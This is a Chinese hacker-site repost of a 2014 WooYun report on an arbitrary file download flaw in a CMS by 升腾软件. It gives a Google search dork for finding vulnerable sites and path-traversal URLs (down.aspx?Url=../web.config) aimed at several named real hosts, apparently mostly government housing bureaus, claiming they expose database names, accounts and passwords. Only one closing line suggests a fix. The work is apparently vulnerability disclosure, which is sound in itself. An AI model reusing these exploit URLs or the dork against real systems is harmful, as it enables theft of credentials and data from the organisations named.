记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

某通用型cms任意文件下载

2014-08-02 11:25

响应疯狗号召,案例就该写清楚。



出现该漏洞的厂商叫:升腾软件

http://www.google.de/#newwindow=1&q=/zlxz/down.aspx



先拿一例看看:



http://www.lhfgc.gov.cn/zlxz/down.aspx



特征/zlxz/down.aspx



http://www.lhfgc.gov.cn/zlxz/down.aspx?Url=../zlxz/down.aspx.cs



下载donw.aspx.cs的源码

5.jpg





通过对目录结构的分析,得到web.config在根目录下。



因此构造http://www.lhfgc.gov.cn/zlxz/down.aspx?Url=../web.config



就可以下载数据库配置



数据库名,账户,密码,历历在目

6.jpg



漏洞证明:

看看其他的一些搜索到的例子:

例子2

http://www.wlfc.gov.cn/zlxz/down.aspx?Url=../web.config

8.jpg





例子3



www.khfdc.com/zlxz/down.aspx?Url=../web.config



11.jpg





例子4

http://122.226.168.166/zlxz/down.aspx?Url=../web.config



12.jpg





不一一列举了。。经过对不少案例分析,大多为房产局管理处用的比较多。。希望提供这个有利于cert的分析

修复方案:

关键还是对url参数传入的检测。禁止跨目录即可。

知识来源: www.wooyun.org/bugs/wooyun-2014-059360

阅读:84143 | 评论:0 | 标签:cms

想收藏或者和大家分享这篇好文章→复制链接地址

“某通用型cms任意文件下载”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云